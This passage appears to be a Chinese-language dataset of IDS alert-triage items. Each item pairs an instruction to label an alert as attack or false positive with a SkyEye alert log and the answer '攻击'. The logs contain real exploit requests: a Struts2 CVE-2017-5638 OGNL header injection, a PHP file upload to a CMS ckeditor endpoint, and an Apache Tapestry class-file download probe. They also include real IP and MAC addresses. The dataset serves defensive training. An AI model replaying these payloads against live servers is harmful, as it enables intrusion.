"00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020798", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "Struts2-045远程命令执行漏洞(CVE-2017-5638)", "attack_type": "命令执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1、升级到Struts2.3.32 或者Struts 2.5.10.1版本。官方升级地址:https://dist.apache.org/repos/dist/release/struts/2.5.10.1/, https://dist.apache.org/repos/dist/release/struts/2.3.32/。\r\n2、删除commons-fileupload-x.x.x.jar文件。请注意删除该文件可能导致网站的上传功能或其他应用无法正常使用。", "hit_start": "171", "skyeye_id": "", "payload": {"req_header": "R0VUIC8gSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS41NjozMDAwMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgcnY6NzguMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC83OC4wDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOQ0KQ29udGVudC1UeXBlOiAleyNjb250ZXh0Wydjb20ub3BlbnN5bXBob255Lnh3b3JrMi5kaXNwYXRjaGVyLkh0dHBTZXJ2bGV0UmVzcG9uc2UnXS5hZGRIZWFkZXIoJ1gtUkVTJyw0NDc5Mio0NDIwNSl9Lm11bHRpcGFydC9mb3JtLWRhdGENCkRudDogMQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_9559054c743fc18ef71552e26328f971", "access_time": "2024-11-27 14:16:27", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16090000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-RES',44792*44205)}.multipart/form-data", "sip": "223.160.174.104", "dimension": "3", "url_path": "/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET / HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-RES',44792*44205)}.multipart/form-data\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268568472-Struts2-045远程命令执行漏洞(CVE-2017-5638)", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12510", "h_url": "/"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688187", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "文件上传", "_origin": {"write_date": 1732688187, "vuln_harm": "可能是恶意webshell,导致服务器失陷。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.68.194", "site_app": "", "hit_end": 171, "uri": "/Common/ckeditor/plugins/multiimg/dialogs/image_upload.php", "dport": 30001, "vuln_name": "发现PHP脚本文件上传行为", "rsp_status": 0, "code_language": "PHP", "solution": "确认上传的脚本是否有害,如有害尽快删除。", "hit_start": 151, "detail_info": "发现上传PHP脚本行为,php脚本是用PHP语言编写的在线管理程序,实用、简洁、小巧。此告警发现黑客正在上传php后门程序,严重可导致服务器信息泄露。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "发现上传PHP脚本行为,php脚本是用PHP语言编写的在线管理程序,实用、简洁、小巧。此告警发现黑客正在上传php后门程序,严重可导致服务器信息泄露。", "public_date": "2020-05-18 17:06:06", "sport": 12512}, "detail_info": "发现上传PHP脚本行为,php脚本是用PHP语言编写的在线管理程序,实用、简洁、小巧。此告警发现黑客正在上传php后门程序,严重可导致服务器信息泄露。", "file_md5": "6a82328a2be66bb2e2c45fbca76eb8f4", "rule_key": "webids", "api": "218.76.15.56:30001/Common/ckeditor/plugins/multiimg/dialogs/{filename}", "first_access_time": "2024-11-27 14:16:27", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现PHP脚本文件上传行为", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "a893771ec5598e7288f9a60e1946824f", "xff": "", "vuln_desc": "发现上传PHP脚本行为,php脚本是用PHP语言编写的在线管理程序,实用、简洁、小巧。此告警发现黑客正在上传php后门程序,严重可导致服务器信息泄露。", "attack_chain": "0x02020000", "vuln_harm": "可能是恶意webshell,导致服务器失陷。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688166", "code_language": "PHP", "public_date": "2020-05-18 17:06:06", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "171", "h_proto_version": "HTTP/1.1", "uri": "/Common/ckeditor/plugins/multiimg/dialogs/image_upload.php", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x100208ac", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "发现PHP脚本文件上传行为", "attack_type": "文件上传", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "确认上传的脚本是否有害,如有害尽快删除。", "hit_start": "151", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvQ29tbW9uL2NrZWRpdG9yL3BsdWdpbnMvbXVsdGlpbWcvZGlhbG9ncy9pbWFnZV91cGxvYWQucGhwIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQ29udGVudC1MZW5ndGg6IDIxMA0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkNvbnRlbnQtVHlwZTogbXVsdGlwYXJ0L2Zvcm0tZGF0YTsgYm91bmRhcnk9LS0tLVdlYktpdEZvcm1Cb3VuZGFyeXh0emxpa2J5DQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "LS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5eHR6bGlrYnkNCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZmlsZXMiOyBmaWxlbmFtZT0id2pka21iLnBocCINCkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZw0KDQo8P3BocCBlY2hvIG1kNSg0MDMyNCk7dW5saW5rKF9fRklMRV9fKTs/Pg0KLS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5eHR6bGlrYnktLQ0K", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_315db41206a9cc7d31987e9e97b2f19e", "access_time": "2024-11-27 14:16:27", "content-length": "210", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16110000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|路过式攻击:T1189", "upgrade-insecure-requests": "1", "content-type": "multipart/form-data; boundary=----WebKitFormBoundaryxtzlikby", "sip": "223.160.174.104", "dimension": "3", "url_path": "/Common/ckeditor/plugins/multiimg/dialogs/image_upload.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "image_upload.php", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 210\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxtzlikby\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "------WebKitFormBoundaryxtzlikby\r\nContent-Disposition: form-data; name=\"files\"; filename=\"wjdkmb.php\"\r\nContent-Type: image/jpeg\r\n\r\n<?php echo md5(40324);unlink(__FILE__);?>\r\n------WebKitFormBoundaryxtzlikby--\r\n", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268568748-发现PHP脚本文件上传行为", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12512", "h_url": "/Common/ckeditor/plugins/multiimg/dialogs/image_upload.php"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688187", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "webshell上传", "_origin": {"write_date": 1732688187, "vuln_harm": "受害主机可能将会被植入后门、远控或木马,导致受害主机沦陷,成为傀儡机。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.68.194", "site_app": "其他", "hit_end": 144, "uri": "/Common/ckeditor/plugins/multiimg/dialogs/image_upload.php", "dport": 30001, "vuln_name": "发现上传php_webshell木马行为", "rsp_status": 0, "code_language": "PHP", "solution": "请尽快排查受害主机上是否存在php_webshell并进行查杀,并修复系统漏洞。", "hit_start": 124, "detail_info": "发现上传php_webshell行为,php_webshell是用PHP语言编写的在线管理程序,实用、简洁、小巧。此告警发现黑客正在上传php后门程序,严重可导致服务器信息泄露。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "发现上传php_webshell行为,php_webshell是用PHP语言编写的在线管理程序,实用、简洁、小巧。此告警发现黑客正在上传php后门程序,严重可导致服务器信息泄露。", "public_date": "2018-07-10 15:05:56", "sport": 12512}, "detail_info": "发现上传php_webshell行为,php_webshell是用PHP语言编写的在线管理程序,实用、简洁、小巧。此告警发现黑客正在上传php后门程序,严重可导致服务器信息泄露。", "file_md5": "6a82328a2be66bb2e2c45fbca76eb8f4", "rule_key": "webids", "api": "218.76.15.56:30001/Common/ckeditor/plugins/multiimg/dialogs/{filename}", "first_access_time": "2024-11-27 14:16:27", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现上传php_webshell木马行为", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "d1edb46d389bb6ee5fd6df525abfecc4", "xff": "", "vuln_desc": "发现上传php_webshell行为,php_webshell是用PHP语言编写的在线管理程序,实用、简洁、小巧。此告警发现黑客正在上传php后门程序,严重可导致服务器信息泄露。", "attack_chain": "0x02020000", "vuln_harm": "受害主机可能将会被植入后门、远控或木马,导致受害主机沦陷,成为傀儡机。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688166", "code_language": "PHP", "public_date": "2018-07-10 15:05:56", "skyeye_serial_num": "QbJK/8ze/", "site_app": "其他", "super_attack_chain": "0x02000000", "hit_end": "144", "h_proto_version": "HTTP/1.1", "uri": "/Common/ckeditor/plugins/multiimg/dialogs/image_upload.php", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x1002052a", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "发现上传php_webshell木马行为", "attack_type": "webshell上传", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "请尽快排查受害主机上是否存在php_webshell并进行查杀,并修复系统漏洞。", "hit_start": "124", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvQ29tbW9uL2NrZWRpdG9yL3BsdWdpbnMvbXVsdGlpbWcvZGlhbG9ncy9pbWFnZV91cGxvYWQucGhwIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQ29udGVudC1MZW5ndGg6IDIxMA0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkNvbnRlbnQtVHlwZTogbXVsdGlwYXJ0L2Zvcm0tZGF0YTsgYm91bmRhcnk9LS0tLVdlYktpdEZvcm1Cb3VuZGFyeXh0emxpa2J5DQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "LS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5eHR6bGlrYnkNCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZmlsZXMiOyBmaWxlbmFtZT0id2pka21iLnBocCINCkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZw0KDQo8P3BocCBlY2hvIG1kNSg0MDMyNCk7dW5saW5rKF9fRklMRV9fKTs/Pg0KLS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5eHR6bGlrYnktLQ0K", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_04d35773a82ad091e7d80a9554a24e4c", "access_time": "2024-11-27 14:16:27", "content-length": "210", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "161C0000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "multipart/form-data; boundary=----WebKitFormBoundaryxtzlikby", "sip": "223.160.174.104", "dimension": "3", "url_path": "/Common/ckeditor/plugins/multiimg/dialogs/image_upload.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "image_upload.php", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 210\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxtzlikby\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "------WebKitFormBoundaryxtzlikby\r\nContent-Disposition: form-data; name=\"files\"; filename=\"wjdkmb.php\"\r\nContent-Type: image/jpeg\r\n\r\n<?php echo md5(40324);unlink(__FILE__);?>\r\n------WebKitFormBoundaryxtzlikby--\r\n", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567850-发现上传php_webshell木马行为", "rule_labels": "{\"0x110101\": {\"parent_id\": \"0x110100\", \"type\": \"攻击阶段\", \"name\": \"后门上传\", \"parent_name\": \"后门上传利用\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12512", "h_url": "/Common/ckeditor/plugins/multiimg/dialogs/image_upload.php"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688187", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "文件上传", "_origin": {"write_date": 1732688187, "vuln_harm": "狮子鱼CMS image_upload.php页面存在任意文件上传漏洞。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.68.194", "site_app": "", "hit_end": 135, "uri": "/Common/ckeditor/plugins/multiimg/dialogs/image_upload.php", "dport": 30001, "vuln_name": "狮子鱼CMS image_upload.php页面 任意文件上传漏洞", "rsp_status": 0, "code_language": "", "solution": "请及时关注厂商信息:https://www.shiziyu.net/index.html", "hit_start": 115, "detail_info": "狮子鱼CMS使用CK编辑器,存在图片上传的绕过,造成 image_upload.php 任意文件上传。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "狮子鱼CMS使用CK编辑器,存在图片上传的绕过,造成 image_upload.php 任意文件上传。", "public_date": "2022-09-19 10:40:29", "sport": 12512}, "detail_info": "狮子鱼CMS使用CK编辑器,存在图片上传的绕过,造成 image_upload.php 任意文件上传。", "file_md5": "6a82328a2be66bb2e2c45fbca76eb8f4", "rule_key": "webids", "api": "218.76.15.56:30001/Common/ckeditor/plugins/multiimg/dialogs/{filename}", "first_access_time": "2024-11-27 14:16:27", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "狮子鱼CMS image_upload.php页面 任意文件上传漏洞", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "ad1652439d7333094f3cd30edabb6ebb", "xff": "", "vuln_desc": "狮子鱼CMS使用CK编辑器,存在图片上传的绕过,造成 image_upload.php 任意文件上传。", "attack_chain": "0x02010000", "vuln_harm": "狮子鱼CMS image_upload.php页面存在任意文件上传漏洞。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688166", "code_language": "", "public_date": "2022-09-19 10:40:29", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "135", "h_proto_version": "HTTP/1.1", "uri": "/Common/ckeditor/plugins/multiimg/dialogs/image_upload.php", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x1002120b", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "狮子鱼CMS image_upload.php页面 任意文件上传漏洞", "attack_type": "文件上传", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "请及时关注厂商信息:https://www.shiziyu.net/index.html", "hit_start": "115", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvQ29tbW9uL2NrZWRpdG9yL3BsdWdpbnMvbXVsdGlpbWcvZGlhbG9ncy9pbWFnZV91cGxvYWQucGhwIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQ29udGVudC1MZW5ndGg6IDIxMA0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkNvbnRlbnQtVHlwZTogbXVsdGlwYXJ0L2Zvcm0tZGF0YTsgYm91bmRhcnk9LS0tLVdlYktpdEZvcm1Cb3VuZGFyeXh0emxpa2J5DQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "LS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5eHR6bGlrYnkNCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZmlsZXMiOyBmaWxlbmFtZT0id2pka21iLnBocCINCkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZw0KDQo8P3BocCBlY2hvIG1kNSg0MDMyNCk7dW5saW5rKF9fRklMRV9fKTs/Pg0KLS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5eHR6bGlrYnktLQ0K", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_5b2ceb86c491fd2b06aa569479278113", "access_time": "2024-11-27 14:16:27", "content-length": "210", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16110000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "multipart/form-data; boundary=----WebKitFormBoundaryxtzlikby", "sip": "223.160.174.104", "dimension": "3", "url_path": "/Common/ckeditor/plugins/multiimg/dialogs/image_upload.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "image_upload.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 210\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxtzlikby\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "------WebKitFormBoundaryxtzlikby\r\nContent-Disposition: form-data; name=\"files\"; filename=\"wjdkmb.php\"\r\nContent-Type: image/jpeg\r\n\r\n<?php echo md5(40324);unlink(__FILE__);?>\r\n------WebKitFormBoundaryxtzlikby--\r\n", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268571147-狮子鱼CMS image_upload.php页面 任意文件上传漏洞", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12512", "h_url": "/Common/ckeditor/plugins/multiimg/dialogs/image_upload.php"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688185", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "文件下载", "_origin": {"write_date": 1732688185, "vuln_harm": "攻击者可以通过请求包含HMAC秘钥的URL下载文件AppModule.class,在获取HMAC秘钥的情况下,最终远程执行命令。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "", "hit_end": 45, "uri": "/assets/something/services/AppModule.class", "dport": 30001, "vuln_name": "Apache Tapestry安全漏洞(CVE-2019-0195)", "rsp_status": 0, "code_language": "", "solution": "目前官方已修复了此漏洞,建议升级到5.4.3及以上版本:\r\n\r\n下载地址:https://tapestry.apache.org/download.html", "hit_start": 25, "detail_info": "Apache Tapestry是一种用Java编写的面向组件的Web应用程序框架。该框架存在安全漏洞,攻击者可猜测可能的class文件路径,并通过直接访问对应URL下载该文件。受影响的版本为 5.4.0。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "Apache Tapestry是一种用Java编写的面向组件的Web应用程序框架。该框架存在安全漏洞,攻击者可猜测可能的class文件路径,并通过直接访问对应URL下载该文件。受影响的版本为 5.4.0。", "public_date": "2021-06-09 14:19:47", "sport": 12524}, "detail_info": "Apache Tapestry是一种用Java编写的面向组件的Web应用程序框架。该框架存在安全漏洞,攻击者可猜测可能的class文件路径,并通过直接访问对应URL下载该文件。受影响的版本为 5.4.0。", "file_md5": "332e5b52345b2ed0b0190c2ed787d6e8", "rule_key": "webids", "api": "218.76.15.56:30001/assets/something/services/AppModule.class", "first_access_time": "2024-11-27 14:16:25", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Apache Tapestry安全漏洞(CVE-2019-0195)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "90c62e326c9d3c8a165815785a56ddd1", "xff": "", "vuln_desc": "Apache Tapestry是一种用Java编写的面向组件的Web应用程序框架。该框架存在安全漏洞,攻击者可猜测可能的class文件路径,并通过直接访问对应URL下载该文件。受影响的版本为 5.4.0。", "attack_chain": "0x02020000", "vuln_harm": "攻击者可以通过请求包含HMAC秘钥的URL下载文件AppModule.class,在获取HMAC秘钥的情况下,最终远程执行命令。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688165", "code_language": "", "public_date": "2021-06-09 14:19:47", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "45", "h_proto_version": "HTTP/1.1", "uri": "/assets/something/services/AppModule.class", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020d87", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "Apache Tapestry安全漏洞(CVE-2019-0195)", "attack_type": "文件下载", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "目前官方已修复了此漏洞,建议升级到5.4.3及以上版本:\r\n\r\n下载地址:https://tapestry.apache.org/download.html", "hit_start": "25", "skyeye_id": "", "payload": {"req_header": "R0VUIC9hc3NldHMvc29tZXRoaW5nL3NlcnZpY2VzL0FwcE1vZHVsZS5jbGFzcyBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjU2OjMwMDAxDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBydjo3OC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94Lzc4LjANCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_7a0719728e4bf50f9dea33ba1275bc6b", "access_time": "2024-11-27 14:16:25", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16120000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", 